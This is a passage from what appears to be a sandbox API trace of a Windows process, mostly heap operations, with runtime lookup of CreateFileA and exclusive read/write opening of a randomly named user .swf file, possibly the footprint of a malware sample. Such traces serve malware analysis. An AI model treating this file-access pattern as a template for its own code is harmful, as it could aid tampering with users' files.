(HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0042.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.866] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.868] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0042.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ce20 [0042.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ce20, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0042.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.868] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0042.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce20 [0042.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ce20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0042.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.869] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0042.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0042.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.869] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0042.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0042.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0042.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0042.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x49) returned 0x7f3688 [0042.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf", cchWideChar=73, lpMultiByteStr=0x7f3688, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf", lpUsedDefaultChar=0x0) returned 73 [0042.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0042.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0042.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.870] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.870] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\8y1trplfo1lpoj0q.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.870] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0042.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=73, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x92) returned 0x7c5448 [0042.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=73, lpWideCharStr=0x7c5448, cchWideChar=73 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\8Y1tRpLFO1LPoJ0Q.swf") returned 73 [0042.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0042.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.871] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.871] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0042.872] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0042.872] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.872] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0042.873] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.874] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.874] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.874] PeekMessageW (in: lpMsg=0x6aedfc, 